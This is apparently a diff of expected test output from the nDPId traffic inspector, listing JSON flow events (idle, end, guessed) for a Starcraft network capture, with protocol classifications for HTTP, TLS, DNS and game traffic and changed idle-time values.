+00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985925,"flow_last_seen":1437389985961,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3532,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985925,"flow_last_seen":1437389985962,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3533,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985960,"flow_last_seen":1437389985960,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3534,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985960,"flow_last_seen":1437389985960,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3534,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":215,"flow_first_seen":1437389982130,"flow_last_seen":1437389985956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":38286,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"213.248.127.130","src_port":3517,"dst_port":1119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Starcraft","breed":"Fun","category":"Game"}} +00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968519,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3479,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968519,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3479,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968525,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3480,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968525,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3480,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968520,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3481,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968520,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3481,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968519,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3482,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968519,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3482,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3489,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3489,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3490,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3490,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3491,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3491,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968486,"flow_last_seen":1437389968520,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3492,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968486,"flow_last_seen":1437389968520,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3492,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00820{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389964752,"flow_last_seen":1437389964835,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":60026,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00667{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389953643,"flow_last_seen":1437389953774,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":22,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.30.252.91","dst_ip":"192.168.1.100","src_port":443,"dst_port":3213,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"}} -00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389953643,"flow_last_seen":1437389953774,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":22,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.30.252.91","dst_ip":"192.168.1.100","src_port":443,"dst_port":3213,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389953643,"flow_last_seen":1437389953774,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":22,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.30.252.91","dst_ip":"192.168.1.100","src_port":443,"dst_port":3213,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"}} +00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389953643,"flow_last_seen":1437389953774,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":22,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.30.252.91","dst_ip":"192.168.1.100","src_port":443,"dst_port":3213,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389982884,"flow_last_seen":1437389982933,"flow_idle_time":180000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"213.248.127.166","src_port":6113,"dst_port":1119,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Starcraft","breed":"Fun","category":"Game"}} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389982884,"flow_last_seen":1437389982933,"flow_idle_time":180000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"213.248.127.166","src_port":6113,"dst_port":1119,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389982782,"flow_last_seen":1437389982833,"flow_idle_time":180000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"213.248.127.212","src_port":6113,"dst_port":1119,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Starcraft","breed":"Fun","category":"Game"}} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389982782,"flow_last_seen":1437389982833,"flow_idle_time":180000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"213.248.127.212","src_port":6113,"dst_port":1119,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1437389981197,"flow_last_seen":1437389981500,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":515,"flow_tot_l4_payload_len":654,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3515,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1437389981330,"flow_last_seen":1437389981497,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2996,"flow_avg_l4_payload_len":249,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3516,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1437389982140,"flow_last_seen":1437389982442,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":519,"flow_tot_l4_payload_len":656,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3518,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1437389982269,"flow_last_seen":1437389982443,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":463,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3519,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1437389983663,"flow_last_seen":1437389983964,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":515,"flow_tot_l4_payload_len":654,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3521,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1437389983788,"flow_last_seen":1437389983963,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2996,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3522,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1437389985308,"flow_last_seen":1437389985615,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":491,"flow_tot_l4_payload_len":638,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3523,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1437389985320,"flow_last_seen":1437389985635,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":499,"flow_tot_l4_payload_len":644,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3524,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1437389985434,"flow_last_seen":1437389985610,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3255,"flow_avg_l4_payload_len":271,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.40","src_port":3525,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1437389985446,"flow_last_seen":1437389985631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3062,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.40","src_port":3526,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1437389981197,"flow_last_seen":1437389981500,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":515,"flow_tot_l4_payload_len":654,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3515,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1437389981330,"flow_last_seen":1437389981497,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2996,"flow_avg_l4_payload_len":249,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3516,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1437389982140,"flow_last_seen":1437389982442,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":519,"flow_tot_l4_payload_len":656,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3518,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 